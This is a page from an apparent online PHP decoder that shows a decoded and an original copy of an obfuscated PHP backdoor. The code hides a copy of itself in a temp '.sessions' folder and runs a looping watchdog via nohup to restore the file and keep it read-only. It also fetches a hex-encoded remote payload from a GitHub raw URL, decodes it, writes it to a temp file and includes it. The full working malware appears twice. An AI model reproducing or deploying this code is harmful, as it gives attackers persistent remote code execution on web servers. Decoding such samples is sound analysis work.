Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $XkZa = "57533b772e4f871df59c0c712adb8c03"; $_t = SyS_GeT_tEmp_DiR(); if (!is_dir..

Decoded Output download

<?php 
$XkZa = "57533b772e4f871df59c0c712adb8c03"; 
$_t = SyS_GeT_tEmp_DiR(); 
if (!is_dir($_t . "/.sessions")) { 
    mkdir($_t . "/.sessions"); 
} 
if (!is_file($_t . '/.sessions/.-' . nameMad() . ".tmp")) { 
    copy($_SERVER["SCRIPT_FILENAME"], $_t . "/.sessions/.-" . nameMad() . ".tmp"); 
} 
if (file_exists($_t . "/.sessions/.-" . nameMad() . ".tmp")) { 
    $_F = $_t . "/.sessions/.-" . nameMad() . ".tmp"; 
    FiLe_PuT_CoNtEnTs($_t . "/.sessions/.-" . handlerName() . ".tmp", ' 
    <?php 
while (True) { 
    if (!file_exists("' . $_SERVER["SCRIPT_FILENAME"] . '")) { 
        CoPy("' . $_F . '", "' . $_SERVER["SCRIPT_FILENAME"] . '"); 
    } 
    if (FiLePeRmS("' . $_SERVER["SCRIPT_FILENAME"] . '") != "0444") { 
        ChMoD("' . $_SERVER["SCRIPT_FILENAME"] . '", 0444); 
    } 
} 
?>'); 
    if (isset($_GET['lock'])) { 
        ChMoD($_SERVER["SCRIPT_FILENAME"], 0444); 
        _mad_cmd('sh -c "nohup $(nohup php ' . $_t . '/.sessions/.-' . handlerName() . '.tmp < /dev/null &) < /dev/null &"'); 
    } 
} 
function _oOaA($url) 
{ 
    if (function_exists('curl_exec')) { 
        $conn = curl_init($url); 
        curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, true); 
        curl_setopt($conn, CURLOPT_FRESH_CONNECT,  true); 
        curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); 
        $url_get_contents_data = (curl_exec($conn)); 
        curl_close($conn); 
    } elseif (function_exists('file_get_contents')) { 
        $url_get_contents_data = file_get_contents($url); 
    } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { 
        $handle = fopen($url, "r"); 
        $url_get_contents_data = stream_get_contents($handle); 
    } else { 
        $url_get_contents_data = false; 
    } 
    return $url_get_contents_data; 
} 
$Array = [ 
    '68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f766c61696e313333372f64666163652f726566732f68656164732f6d61696e2f746168692f626170616b677767616e74656e67', 
    '677767616e74656e6731333337', 
    '6865783262696e' 
 
]; 
$hitung_array = count($Array); 
for ($i = 0; $i < $hitung_array; $i++) { 
    $fungsi[] = unhex($Array[$i]); 
} 
function unhex($y) 
{ 
    $n = ''; 
    for ($i = 0; $i < strlen($y) - 1; $i += 2) { 
        $n .= chr(hexdec($y[$i] . $y[$i + 1])); 
    } 
    return $n; 
} 
function hex($n) 
{ 
    $y = ''; 
    for ($i = 0; $i < strlen($n); $i++) { 
        $y .= dechex(ord($n[$i])); 
    } 
    return $y; 
} 
 
function nameMad() 
{ 
    return "90125467239121912" . base64_encode(__DIR__); 
} 
function handlerName() 
{ 
    return "901H0012121045689" . base64_encode(__DIR__); 
} 
function Psaux() 
{ 
    return "87121271212717" . base64_encode(__DIR__); 
} 
 
function ____($_____) 
{ 
    $_a = sYs_gEt_TeMp_dIr(); 
    $tmpfname = TeMpNaM($_a, "unix.11"); 
    $handle = fOpEn($tmpfname, "w+"); 
    fWrItE($handle, "<?php " . $_____); 
    FcLoSe($handle); 
    include $tmpfname; 
    array_map('unlink', glob($_a . "/*.11*")); 
    return get_defined_vars(); 
} 
 
$data = _oOaA($fungsi[0]); 
if ($data) { 
    eXtRaCt(____($fungsi[2](base64_decode($data)))); 
} 
 ?>

Did this file decode correctly?

Original Code

<?php
$XkZa = "57533b772e4f871df59c0c712adb8c03";
$_t = SyS_GeT_tEmp_DiR();
if (!is_dir($_t . "/.sessions")) {
    mkdir($_t . "/.sessions");
}
if (!is_file($_t . '/.sessions/.-' . nameMad() . ".tmp")) {
    copy($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"], $_t . "/.sessions/.-" . nameMad() . ".tmp");
}
if (file_exists($_t . "/.sessions/.-" . nameMad() . ".tmp")) {
    $_F = $_t . "/.sessions/.-" . nameMad() . ".tmp";
    FiLe_PuT_CoNtEnTs($_t . "/.sessions/.-" . handlerName() . ".tmp", '
    <?php
while (True) {
    if (!file_exists("' . $_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"] . '")) {
        CoPy("' . $_F . '", "' . $_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"] . '");
    }
    if (FiLePeRmS("' . $_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"] . '") != "0444") {
        ChMoD("' . $_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"] . '", 0444);
    }
}
?>');
    if (isset($_GET['lock'])) {
        ChMoD($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"], 0444);
        _mad_cmd('sh -c "nohup $(nohup php ' . $_t . '/.sessions/.-' . handlerName() . '.tmp < /dev/null &) < /dev/null &"');
    }
}
function _oOaA($url)
{
    if (function_exists('curl_exec')) {
        $conn = curl_init($url);
        curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, true);
        curl_setopt($conn, CURLOPT_FRESH_CONNECT,  true);
        curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
        $url_get_contents_data = (curl_exec($conn));
        curl_close($conn);
    } elseif (function_exists('file_get_contents')) {
        $url_get_contents_data = file_get_contents($url);
    } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
        $handle = fopen($url, "r");
        $url_get_contents_data = stream_get_contents($handle);
    } else {
        $url_get_contents_data = false;
    }
    return $url_get_contents_data;
}
$Array = [
    '68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f766c61696e313333372f64666163652f726566732f68656164732f6d61696e2f746168692f626170616b677767616e74656e67',
    '677767616e74656e6731333337',
    '6865783262696e'

];
$hitung_array = count($Array);
for ($i = 0; $i < $hitung_array; $i++) {
    $fungsi[] = unhex($Array[$i]);
}
function unhex($y)
{
    $n = '';
    for ($i = 0; $i < strlen($y) - 1; $i += 2) {
        $n .= chr(hexdec($y[$i] . $y[$i + 1]));
    }
    return $n;
}
function hex($n)
{
    $y = '';
    for ($i = 0; $i < strlen($n); $i++) {
        $y .= dechex(ord($n[$i]));
    }
    return $y;
}

function nameMad()
{
    return "90125467239121912" . base64_encode(__DIR__);
}
function handlerName()
{
    return "901H0012121045689" . base64_encode(__DIR__);
}
function Psaux()
{
    return "87121271212717" . base64_encode(__DIR__);
}

function ____($_____)
{
    $_a = sYs_gEt_TeMp_dIr();
    $tmpfname = TeMpNaM($_a, "\x75\x6E\x69\x78\x2E\x31\x31");
    $handle = fOpEn($tmpfname, "w+");
    fWrItE($handle, "<?php " . $_____);
    FcLoSe($handle);
    include $tmpfname;
    array_map('unlink', glob($_a . "/*.11*"));
    return get_defined_vars();
}

$data = _oOaA($fungsi[0]);
if ($data) {
    eXtRaCt(____($fungsi[2](base64_decode($data))));
}

Function Calls

None

Variables

None

Stats

MD5 df3ee0767d9510b476f62a046eacff72
Eval Count 0
Decode Time 117 ms